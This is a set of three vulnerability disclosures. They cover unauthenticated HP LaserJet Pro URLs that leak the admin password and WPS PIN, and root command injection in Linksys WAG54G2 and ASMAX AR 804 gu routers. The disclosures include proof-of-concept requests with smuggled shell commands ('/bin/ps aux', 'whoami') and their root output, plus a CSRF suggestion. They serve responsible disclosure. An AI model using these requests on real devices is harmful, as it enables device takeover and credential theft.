HP LaserJet Pro printers remote admin password extraction
Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract admin password in plaintext among other information like WiFi settings (including WPS PIN). Models affected: HP LaserJet Pro P1102w, HP LaserJet Pro P1606dn, HP LaserJet Pro CP1025nw, HP LaserJet Pro M1212nf MFP, HP LaserJet Pro M1213nf MFP, HP LaserJet Pro M1214nfh MFP, HP LaserJet Pro M1216nfh MFP, HP LaserJet Pro M1217nfw MFP, HP LaserJet Pro M1218nfs MFP, Possibly others(?) URLs details: Here are at least two interesting URLs, which can be accessed without authentication: http://IP_ADDRESS/dev/save_restore.xml (gives admin password/configuration parameters in plaintext) http://IP_ADDRESS:8080/IoMgmt/Adapters/wifi0/WPS/Pin (gives WPS PIN in plaintext) Original disclosure: http://sekurak.pl/hp-laserjet-pro-printers-remote-admin-password-extraction/ Original information from HP: https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.begCacheTok=com.vignette.cachetokenjavax.portlet.endCacheTok=com.vignette.cachetokenjavax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%253Demr_na-c03825817-1%257CdocLocale%253D%257CcalledBy%253Djavax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01ac.admitted=1375697666155.876444892.199480143 History 19.04.2013 vendor notified 19.04.2013 initial vendor response received 24.04.2013 issue confirmed 26.07.2013 new firmwares released 31.07.2013 issues summary published by vendor 02.08.2013 disclosure -- Michal Sajdak, Securitum
Linksys WAG54G2 Web Management Console Local Arbitrary Shell Command Injection Vulnerability
1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10). 3. PoC: GET /setup.cgi?ping_ipaddr1=1ping_ipaddr2=1ping_ipaddr3=1ping_ipaddr4=1ping_size=60ping_number=1ping_interval=1000ping_timeout=5000start=Start+Testtodo=ping_testthis_file=Diagnostics.htmnext_file=Diagnostics.htmc4_ping_ipaddr=1.1.1.1;/bin/ps auxmessage= HTTP/1.1 Host: 192.168.1.1 Authorization: Basic YWRtaW46YWRtaW4= HTTP/1.0 200 OK sh: cannot create 1: Unknown error 30 killall: pingmultilang: no process killed killall: 2: no process killed PID Uid VmSize Stat Command 1 root284 S init 2 rootSWN [ksoftirqd/0] 3 rootSW [events/0] 4 rootSW [khelper] 5 rootSW [kthread] ... 4. Note that it is needed to supply valid user/password (Authorization HTTP header). 5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management. 6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched). 7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
ASMAX AR 804 gu Web Management Console Arbitrary Shell Command Injection Vulnerability
1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface. 3. When 'system' paramether is passed to the script it allows running OS shell commands (as root). 4. PoC: GET request to: http://192.168.1.1/cgi-bin/script?system%20whoami Returns: root 5. Using CSRF attack one could remotely own a router using for example simple img html tags pointing to http://192.168.1.1/... 6. The issue was tested on firmware: 66.34.1 7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched). 8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise
